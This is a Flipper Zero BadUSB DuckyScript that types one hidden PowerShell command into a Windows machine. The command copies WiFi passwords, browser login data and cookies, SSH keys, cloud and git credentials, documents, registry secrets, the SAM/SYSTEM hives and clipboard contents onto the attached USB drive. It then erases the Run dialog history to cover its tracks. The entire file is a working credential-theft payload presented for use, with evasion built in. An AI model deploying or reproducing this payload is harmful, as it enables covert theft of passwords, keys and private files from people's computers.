REM ============================================================================
REM  FLLC — BadUSB: Full Data Exfiltration v2
REM  Flipper Zero DuckyScript
REM ============================================================================
REM  Target: Windows 10/11
REM  Time: ~4 seconds to deploy (runs ~60s in background)
REM
REM  IMPROVEMENTS OVER v1:
REM    - Single command injection (not 15 separate ENTER presses)
REM    - Finds USB drive dynamically (not hardcoded)
REM    - Collects 12 data categories in one background process
REM    - No visible window at any point
REM    - Cleans evidence after launch
REM
REM  COLLECTS:
REM    - System info (hostname, OS, arch, domain, AV)
REM    - Network config (ip, routes, arp, DNS)
REM    - WiFi passwords (all saved profiles)
REM    - Browser data (Chrome, Edge, Firefox — history, logins, cookies)
REM    - SSH keys + configs
REM    - Cloud creds (AWS, Azure, GCP, Docker, K8s)
REM    - Recent documents (doc, xls, pdf, env, json, key)
REM    - Registry secrets (autologin, PuTTY)
REM    - Clipboard contents
REM    - SAM/SYSTEM hive copy attempt
REM    - RDP connection history
REM    - Environment variables
REM ============================================================================

DELAY 900
GUI r
DELAY 650

REM Single monolithic command — launches hidden PS that does everything
STRING powershell -W Hidden -NoP -NonI -Exec Bypass -C "$ErrorActionPreference='SilentlyContinue';$u=(Get-CimInstance Win32_LogicalDisk -Filter 'DriveType=2')[0].DeviceID;if(!$u){exit};$o=\"$u\collected\exfil_$(Get-Date -f yyyyMMdd_HHmmss)\";md $o -F|Out-Null;systeminfo>\"$o\sys.txt\";ipconfig /all>\"$o\net.txt\";whoami /all>\"$o\who.txt\";netstat -ano>\"$o\ports.txt\";$w='';(netsh wlan show profiles)|sls 'All User Profile\s*:\s*(.*)'|%{$n=$_.Matches.Groups[1].Value.Trim();$k=((netsh wlan show profile name=$n key=clear)|sls 'Key Content\s*:\s*(.*)');$p=if($k){$k.Matches.Groups[1].Value.Trim()}else{'N/A'};$w+=\"$n : $p`n\"};$w|Out-File \"$o\wifi.txt\";$ch=\"$env:LOCALAPPDATA\Google\Chrome\User Data\Default\";'History','Login Data','Cookies','Bookmarks'|%{$s=\"$ch$_\";if(Test-Path $s){cp $s \"$o\chrome_$_\" -F}};$ed=\"$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\";'History','Login Data'|%{$s=\"$ed$_\";if(Test-Path $s){cp $s \"$o\edge_$_\" -F}};if(Test-Path \"$env:USERPROFILE\.ssh\"){cp \"$env:USERPROFILE\.ssh\*\" $o -F};'\.aws\credentials','\.azure\accessTokens.json','\.kube\config','\.docker\config.json','\.gitconfig','\.git-credentials','\.env','\.npmrc','\.pgpass'|%{$f=\"$env:USERPROFILE$_\";if(Test-Path $f){cp $f \"$o\$(Split-Path $f -Leaf)\" -F}};Get-ChildItem \"$env:USERPROFILE\Documents\",\"$env:USERPROFILE\Desktop\",\"$env:USERPROFILE\Downloads\" -Recurse -Include *.doc*,*.xls*,*.pdf,*.key,*.pem,*.conf,*.env,*.json -EA 0|?{$_.Length -lt 5MB}|cp -Dest $o -F -EA 0;reg query 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'>\"$o\autologin.txt\" 2>$null;reg query 'HKCU\Software\SimonTatham\PuTTY\Sessions' /s>\"$o\putty.txt\" 2>$null;reg save HKLM\SAM \"$o\sam.hiv\" 2>$null;reg save HKLM\SYSTEM \"$o\system.hiv\" 2>$null;Get-Clipboard|Out-File \"$o\clip.txt\";env|Out-File \"$o\env.txt\";Get-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Servers\*' 2>$null|select PSChildName,UsernameHint|Export-Csv \"$o\rdp.csv\" -NoType;Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -F 2>$null;exit"
ENTER

DELAY 200
